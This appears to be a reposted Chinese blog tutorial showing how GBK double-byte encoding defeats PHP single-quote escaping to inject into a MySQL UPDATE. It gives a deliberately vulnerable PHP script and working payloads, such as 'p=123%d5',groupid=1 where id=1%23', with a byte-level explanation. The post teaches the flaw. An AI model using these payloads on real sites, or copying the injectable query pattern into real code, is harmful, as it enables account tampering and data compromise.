php 拼接 单双引拼接,双字节编码绕PHP单引号转义又一例: SQL UPDATE注入

最新推荐文章于 2021-09-30 11:30:12 发布
最新推荐文章于 2021-09-30 11:30:12 发布
阅读量224 收藏
点赞数
文章标签: php 拼接 单双引拼接

原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》 http://www.redicecn.com/view-256.html 是一样的。

// by redice 2010.10.21

// 连接mysql数据库

$conn=0;

$conn = mysql_connect("localhost","root","redice2009");

if (!$conn)

{

die("不能打开数据库连接,错误: " . mysql_error());

}

// 选择数据库

mysql_select_db("test", $conn);

// 设置mysql数据库输出数据的字符集

mysql_query("set names 'gbk'");

// 修改密码过程

$newpass=$_REQUEST[p];

$sql = "update user set pass='$newpass' where name='redice'";

echo "执行的查询=".$sql."";

if(!mysql_query($sql,$conn))

{

echo mysql_error();

}

?>

(1)在gpc=off的情况下。

提交p=123',groupid='1  SQL语句变为:

update user set pass='123',groupid='1' where name='redice'

(2)在gpc=on的情况下。

利用GBK双字节编码,可以绕过单引号转义。

分析如下:

提交p=123%d5',groupid=1 where id=1%23

经浏览器url编码后为:

p=123%d5%27,groupid=1%20where%20id=1%23

再经PHP url解码后为:

p=1230xd50x27,groupid=10x20where0x20id=10x23

再经PHP转义后为(在0x27前插入0x5c):

p=1230xd50x5c0x27,groupid=10x20where0x20id=10x23

由于服务端采用gbk编码连接数据库(set names 'gbk'),因此上述字节序列被MySQL作为GBK字符理解后即为:

p=123誠',groupid=1 where id=1#

PS:0xd50x5c 对应了汉字誠,从而吃掉了单引号,绕过转义

最终SQL语句变为:

update user set pass='123誠',groupid=1 where id=1#' where name='redice'

PS:%23解码后为#,用以注释之后的SQL语句,使之符合语法规范。

556ac025da808b380c1d3325f8cf9cb0.gif

附测试程序:

File: Click to Download

智能迷宫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php单双引拼接,js字符串拼接中关于单引号引号的那些事
weixin_35699471的博客
03-25 648
在js开发中一般我们多多少少都会用到字符串拼接,新手们经常会遇到各种错误,其中关于字符串拼接的问题尤其重要,今天来谈一谈。1.常用字符串拼接当我们从后台请求到数据时,传统渲染我们就会将请求到的数据拼接DOM节点,然后添加到页面中,如:$.ajax({type: "post",data: {},url: "xxx",success: function(res){if(res.data){var ht...
php 拼接 单双引拼接,php里单引和引的用法区别和连接符(.)
weixin_28946735的博客
03-11 133
" "引号里面的字段会经过编译器解释,然后再当作HTML代码输出。‘ ‘单引号里面的不进行解释,直接输出。例如:$abc=‘my name is tome‘;echo $abc //结果是:my name is tomecho ‘$abc‘ //结果是:$abcecho "$abc" //结果是:my name is tom一、引号定义字符串在PHP中,通常一个字符串被定义在一对引号中(这里是一...
php中的echo单引号_php中的单引号引号和转义字符详解
weixin_33018713的博客
02-02 663
PHP单引号引号均可以修饰字符串类型的数据,如果修饰的字符串中含有变量(例$name);最大的区别是: 引号会替换变量的值,而单引号会把它当做字符串输出。例如: ...
php sql 语句 引号,在PHP中,引号里面打的单引号还是报错 phpsql语句的单引...
weixin_39878855的博客
04-01 307
报错的原因不是引号里边套单引号的问题;而是你的语法直接就写错了!示例如下:id是int类型的,查询时不需要加引号,直接用.就可以连接了username是字符型的,查询时需要加引号。所以必须要转义,也就是要带上引号不知道可以再联系我其实很简单,只要是sql语句里面的接受传过来的值得时候统一用这样的方式就不会有什么错误的例如:$sql="INSERT INTO `Persons` (`FirstNa...
php 防止单引号,引号在接受页面转义
12-18
PHP页面中如果不希望出现以下情况: 单引号转义为 /’ 引号被转义为 /” 那么可以进行如下设置以防止: 方法一:在php.ini中设置:magic_quotes_gpc = Off 方法二: $str=stripcslashes($str)  您可能感...
sql语句中单引号,引号的处理方法
12-15
下面我们就分别讲述,虽然说的是Insert语句, 但是Select、Update、Delete语句都是一样的。 假如有下述表格: mytabe 字段1 username 字符串型(姓名) 字段2 age 数字型(年龄) 字段3 birthday 日期型...
php 输出引号与单引号的方法
12-17
php 编程中引号”与单引号’是字符串与字符表现形式,那么我们要输出它怎么做呢,下面我们就来看个简单的输出单双引号的实例吧。 首页我们来看输出引号的几种方法 方法一. 复制代码 代码如下: $str =’我要...
分析PHP单双引号的误区和引号小隐患
10-21
PHP单双引号常常会给人带来很多的误区,其中引号还有些小隐患,下面是小编给大家整理的,需要的可以参考。
PHP单引号引号的区别分析
12-18
单引号引号中都可以使用转义字符(\),但只能转义单引号中引起来的单引号转义转义符本身。如果用引号(“”)括起字符串,PHP懂得更多特殊字符串的转义序列。 <?php $str1 = '\',\\,\r\n\t\v\$...
PHP SQL语句某字段含有单引号('),执行报错 详解
weixin_41572561的博客
04-24 925
$a = "a'b"; $sql = "INSERT INTO `aa`(`txt`) VALUES ('$a')"; $result = mysql_query($sql); //-----执行报错 使用addslashes() 函数 在预定义字符之前添加反斜杠的字符串 $a = addslashes($a); addslashes() 函数知识点入口 ...
字节编码PHP单引号转义一例SQL UPDATE注入
MyDriverC
01-05 709
原理和《利用字节编码突破PHP单引号转义限制进行SQL注入》 是一样的。 view plaincopy to clipboardprint?   // by redice 2010.10.21     // 连接mysql数据库   $conn=0;   $conn = mysql_connect("localhost","root","redice2009");  
php 单引号过,利用UTF8字节编码能否PHP单引号转义进行注入
weixin_30914751的博客
03-13 638
利用GBK字节编码可以单引号转义进行注入,这在之前的文章中已经分析过了(《利用GBK字节编码突破PHP单引号转义限制进行SQL注入》,http://www.redicecn.com/html/wangluoanquan/20101018/180.html)。今天来讨论一下是否能够利用UTF8字节编码转义。先回顾一下GBK编码转义的原理:GBK编码字节范围是:首字节:0x81-0xF...
关于sql拼接php变量问题
玲曦的博客
07-15 950
如果直接$xxx加入sql语句中,sql语句必须是引号否则不解析变量 $sql = ""; $sql = ''; 单引号字符串中出现的变量不会被变量值替代。即PHP不会解析单引号中的变量,而是将变量名原样输出。引号字符串最重要的一点是其中的变量名会被变量值替代,即可以解析引号中包含的变量。 ...
php单引号过,SQL注入PHP单引号字符转义原理及预防方法
weixin_33829335的博客
04-10 822
http://mo47.com/blog/2011/sql_injection_gpc利用GBK字节编码单引号转义附赠工具一款:PHP汉字url编码转换器PHP测试代码如下/* 注入实验:start */$id = $_GET['id'];//建立连接$conn = false;$conn = mysql_connect("localhost","root","");mysql_query...
php引号解析漏洞
qq_50854662的博客
09-30 370
1|0前言 在PHP语言中,单引号引号都可以表示一个字符串,但是对于引号来说,可能会对引号内的内容进行二次解释,这就可能会出现安全问题。 条件:php版本>5.5 2|0正文 举个简单例子 <?php $a = 1; $b = 2; echo '$a$b';//输出结果为$a$b echo "$a$b";//输出结果为12 ?> 可以看到这两个输出的结果并不相同。 在引号中倘若有${}出现,那么{}内的内容将被当做代码块来执行。 可以看到成功执行了phpinfo() .
拼接sql语句中单引号引号的问题
热门推荐
找寻你的足迹123
11-21 1万+
拼接sql语句中单引号引号的问题
SQL字符串拼接 引号问题
w20101114的专栏
08-05 8791
http://zhidao.baidu.com/question/123901354.html 这个好 拼串的时候用char(39) 代替单引号,char(37)代替% SET @sql = 'SELECT * FROM authors WHERE address LIKE '+char(39)+char(37)+@str+char(37)+char(39)
java中的字符串,正则匹配中引文单双引号然后转义存储
最新发布
05-28
如果要在 Java 中使用正则表达式匹配包含引号的字符串,并将匹配结果保存到字符串中,需要注意以下两个问题: ...然后使用 `while` 循环遍历匹配结果,对每个匹配的部分进行引号和单引号转义,并输出结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值